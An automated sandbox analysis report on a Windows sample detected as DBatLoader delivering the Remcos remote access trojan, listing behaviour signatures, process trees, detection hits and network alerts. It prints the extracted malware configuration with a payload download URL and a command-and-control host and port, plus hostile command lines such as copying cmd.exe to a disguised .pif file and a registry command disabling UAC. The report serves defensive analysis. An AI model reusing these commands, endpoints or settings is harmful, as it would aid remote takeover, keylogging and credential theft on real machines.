Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1m181Ru74o.exe

Overview

General Information

Sample name:1m181Ru74o.exe
renamed because original name is a hash value
Original sample name:050736376a0870aea56e2faf90ea34aa7af231c7b2d3d209bcac91628eec77c9.exe
Analysis ID:1562867
MD5:06a72ba35aaff1b3ab0ea4d3e2e65451
SHA1:656564a2afc61d10e70d4833a0a57ef046709963
SHA256:050736376a0870aea56e2faf90ea34aa7af231c7b2d3d209bcac91628eec77c9
Tags:doganalecmdexeuser-JAMESWT_MHT
Infos:

Detection

Remcos, DBatLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected Remcos RAT
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Creates a thread in another existing process (thread injection)
Delayed program exit found
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Uses dynamic DNS services
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 1m181Ru74o.exe (PID: 7564 cmdline: "C:\Users\user\Desktop\1m181Ru74o.exe" MD5: 06A72BA35AAFF1B3AB0EA4D3E2E65451)
    • cmd.exe (PID: 7800 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\dlftfmtN.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • esentutl.exe (PID: 7860 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • esentutl.exe (PID: 7892 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
    • esentutl.exe (PID: 7900 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\1m181Ru74o.exe /d C:\\Users\\Public\\Libraries\\Ntmftfld.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)
      • conhost.exe (PID: 7928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • SndVol.exe (PID: 7944 cmdline: C:\Windows\System32\SndVol.exe MD5: BD4A1CC3429ED1251E5185A72501839B)
  • Ntmftfld.PIF (PID: 8176 cmdline: "C:\Users\Public\Libraries\Ntmftfld.PIF" MD5: 06A72BA35AAFF1B3AB0EA4D3E2E65451)
    • colorcpl.exe (PID: 5288 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
  • Ntmftfld.PIF (PID: 7464 cmdline: "C:\Users\Public\Libraries\Ntmftfld.PIF" MD5: 06A72BA35AAFF1B3AB0EA4D3E2E65451)
    • colorcpl.exe (PID: 4540 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
{"Download Url": ["https://aarzoomarine.com/wp-content/plugins/231_Ntmftfldhfc"]}
{"Host:Port:Password": ["craekuro.duckdns.org:1950:1"], "Assigned name": "$100 MILLION", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Rmc-YHG91Z", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000D.00000003.1544682057.00000000030F9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000009.00000002.3762154701.0000000002AC7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          0000000F.00000003.1616189351.000000000305C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            0000000D.00000002.1545537004.0000000006D30000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 34 entries
              SourceRuleDescriptionAuthorStrings
              9.2.SndVol.exe.48e0000.1.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                9.2.SndVol.exe.48e0000.1.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                • 0x68778:$a1: Remcos restarted by watchdog!
                • 0x68cd0:$a3: %02i:%02i:%02i:%03i
                • 0x69055:$a4: * Remcos v
                9.2.SndVol.exe.48e0000.1.unpackREMCOS_RAT_variantsunknownunknown
                • 0x6377c:$str_a1: C:\Windows\System32\cmd.exe
                • 0x636f8:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x636f8:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x62ba8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                • 0x633e0:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                • 0x627a4:$str_b2: Executing file:
                • 0x638c0:$str_b3: GetDirectListeningPort
                • 0x631a0:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                • 0x633c8:$str_b7: \update.vbs
                • 0x627cc:$str_b9: Downloaded file:
                • 0x627b8:$str_b10: Downloading file:
                • 0x6285c:$str_b12: Failed to upload file:
                • 0x63888:$str_b13: StartForward
                • 0x638a8:$str_b14: StopForward
                • 0x63370:$str_b15: fso.DeleteFile "
                • 0x63304:$str_b16: On Error Resume Next
                • 0x633a0:$str_b17: fso.DeleteFolder "
                • 0x6284c:$str_b18: Uploaded file:
                • 0x6280c:$str_b19: Unable to delete:
                • 0x63338:$str_b20: while fso.FileExists("
                • 0x62ce1:$str_c0: [Firefox StoredLogins not found]
                9.2.SndVol.exe.48e0000.1.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewerdetects Windows exceutables potentially bypassing UAC using eventvwr.exeditekSHen
                • 0x62698:$s1: \Classes\mscfile\shell\open\command
                • 0x626f8:$s1: \Classes\mscfile\shell\open\command
                • 0x626e0:$s2: eventvwr.exe
                15.2.colorcpl.exe.7091998.1.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                  Click to see the 68 entries

                  System Summary

                  barindex
                  Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\Desktop\1m181Ru74o.exe, ProcessId: 7564, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Libraries\Ntmftfld.PIF" , CommandLine: "C:\Users\Public\Libraries\Ntmftfld.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Ntmftfld.PIF, NewProcessName: C:\Users\Public\Libraries\Ntmftfld.PIF, OriginalFileName: C:\Users\Public\Libraries\Ntmftfld.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: "C:\Users\Public\Libraries\Ntmftfld.PIF" , ProcessId: 8176, ProcessName: Ntmftfld.PIF
                  Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Ntmftfld.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\1m181Ru74o.exe, ProcessId: 7564, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ntmftfld
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Ntmftfld.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\1m181Ru74o.exe, ProcessId: 7564, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ntmftfld
                  Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\Public\Libraries\Ntmftfld.PIF" , CommandLine: "C:\Users\Public\Libraries\Ntmftfld.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Ntmftfld.PIF, NewProcessName: C:\Users\Public\Libraries\Ntmftfld.PIF, OriginalFileName: C:\Users\Public\Libraries\Ntmftfld.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: "C:\Users\Public\Libraries\Ntmftfld.PIF" , ProcessId: 8176, ProcessName: Ntmftfld.PIF

                  Stealing of Sensitive Information

                  barindex
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\SndVol.exe, ProcessId: 7944, TargetFilename: C:\ProgramData\remcos\logs.dat
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-26T08:13:11.560270+010020283713Unknown Traffic192.168.2.1149706103.101.59.23443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-26T08:13:04.679904+010020365941Malware Command and Control Activity Detected192.168.2.1149988172.111.212.1381950TCP
                  2024-11-26T08:13:41.179260+010020365941Malware Command and Control Activity Detected192.168.2.1149723172.111.212.1381950TCP
                  2024-11-26T08:14:04.242949+010020365941Malware Command and Control Activity Detected192.168.2.1149776172.111.212.1381950TCP
                  2024-11-26T08:14:27.274594+010020365941Malware Command and Control Activity Detected192.168.2.1149827172.111.212.1381950TCP
                  2024-11-26T08:14:50.737461+010020365941Malware Command and Control Activity Detected192.168.2.1149879172.111.212.1381950TCP
                  2024-11-26T08:15:13.862812+010020365941Malware Command and Control Activity Detected192.168.2.1149931172.111.212.1381950TCP
                  2024-11-26T08:15:36.901138+010020365941Malware Command and Control Activity Detected192.168.2.1149983172.111.212.1381950TCP
                  2024-11-26T08:16:00.311436+010020365941Malware Command and Control Activity Detected192.168.2.1149984172.111.212.1381950TCP
                  2024-11-26T08:16:23.367443+010020365941Malware Command and Control Activity Detected192.168.2.1149985172.111.212.1381950TCP
                  2024-11-26T08:16:46.429607+010020365941Malware Command and Control Activity Detected192.168.2.1149986172.111.212.1381950TCP
                  2024-11-26T08:17:09.835546+010020365941Malware Command and Control Activity Detected192.168.2.1149987172.111.212.1381950TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: 1m181Ru74o.exeAvira: detected
                  Source: https://aarzoomarine.com/wp-content/plugins/231_NtmftfldhfcAvira URL Cloud: Label: malware
                  Source: https://aarzoomarine.com/owaAvira URL Cloud: Label: phishing
                  Source: https://aarzoomarine.com:443/wp-content/plugins/231_NtmftfldhfcAvira URL Cloud: Label: phishing
                  Source: C:\Users\Public\Libraries\Ntmftfld.PIFAvira: detection malicious, Label: TR/AD.Nekark.ykcgg
                  Source: 1m181Ru74o.exeMalware Configuration Extractor: DBatLoader {"Download Url": ["https://aarzoomarine.com/wp-content/plugins/231_Ntmftfldhfc"]}
                  Source: 0000000D.00000003.1544682057.00000000030F9000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["craekuro.duckdns.org:1950:1"], "Assigned name": "$100 MILLION", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Rmc-YHG91Z", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100"}
                  Source: C:\Users\Public\Libraries\Ntmftfld.PIFReversingLabs: Detection: 65%
                  Source: 1m181Ru74o.exeReversingLabs: Detection: 65%
                  Source: 1m181Ru74o.exeVirustotal: Detection: 83%Perma Link
                  Source: Yara matchFile source: 9.2.SndVol.exe.48e0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.colorcpl.exe.7091998.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.colorcpl.exe.7090000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.colorcpl.exe.6d31998.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.colorcpl.exe.6d30000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.colorcpl.exe.7091998.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.colorcpl.exe.6d31998.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.SndVol.exe.48e1998.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.colorcpl.exe.6d30000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.SndVol.exe.48e1998.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.colorcpl.exe.7090000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.SndVol.exe.48e0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000D.00000003.1544682057.00000000030F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.3762154701.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000003.1616189351.000000000305C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.1545537004.0000000006D30000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.3777713099.0000000025A3F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000003.1616135041.000000000302F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000003.1616096302.0000000003062000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000003.1544796115.00000000030F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.3762154701.0000000002AA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.1617014423.0000000007090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.1544875257.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.1616232247.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 7944, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 5288, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 4540, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability
                  Source: C:\Users\Public\Libraries\Ntmftfld.PIFJoe Sandbox ML: detected
                  Source: 1m181Ru74o.exeJoe Sandbox ML: detected
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,9_2_004315EC
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_04912384 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,9_2_04912384
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,13_2_004315EC
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D62384 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,13_2_06D62384
                  Source: SndVol.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
                  Source: 1m181Ru74o.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                  Source: unknownHTTPS traffic detected: 103.101.59.23:443 -> 192.168.2.11:49706 version: TLS 1.2
                  Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdb source: 1m181Ru74o.exe, 1m181Ru74o.exe, 00000000.00000002.1425448990.0000000002276000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1296625632.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1436624594.0000000014D07000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1297153626.000000007F8A0000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1436624594.0000000014D37000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000005.00000003.1396974122.00000000053E0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.5.dr
                  Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000006.00000003.1402280809.0000000004B40000.00000004.00001000.00020000.00000000.sdmp, xpha.pif.6.dr
                  Source: Binary string: easinvoker.pdbH source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdbGCTL source: 1m181Ru74o.exe, 00000000.00000002.1425448990.0000000002276000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1399478941.0000000015AEF000.00000004.00000020.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1425970905.00000000028E0000.00000004.00000020.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1399478941.0000000015B1E000.00000004.00000020.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1296625632.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1436624594.0000000014D07000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1297153626.000000007F8A0000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1436624594.0000000014D37000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1296854371.00000000028E4000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: cmd.pdb source: esentutl.exe, 00000005.00000003.1396974122.00000000053E0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.5.dr
                  Source: Binary string: ping.pdb source: esentutl.exe, 00000006.00000003.1402280809.0000000004B40000.00000004.00001000.00020000.00000000.sdmp, xpha.pif.6.dr
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02EB5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02EB5908
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,9_2_0041A01B
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,9_2_0040B28E
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_0040838E
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_004087A0
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,9_2_00407848
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_004068CD FindFirstFileW,FindNextFileW,9_2_004068CD
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0044BA59 FindFirstFileExA,9_2_0044BA59
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,9_2_0040AA71
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,9_2_00417AAB
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,9_2_0040AC78
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_048E85E0 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,9_2_048E85E0
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_048E9538 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_048E9538
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_048E7665 FindFirstFileW,FindNextFileW,9_2_048E7665
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0492C7F1 FindFirstFileExA,9_2_0492C7F1
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_048EC026 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,9_2_048EC026
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_048E9126 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_048E9126
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_048FADB3 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,9_2_048FADB3
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_048EB809 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,9_2_048EB809
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_048F8843 FindFirstFileW,9_2_048F8843
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_048EBA10 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,9_2_048EBA10
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,13_2_0041A01B
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,13_2_0040B28E
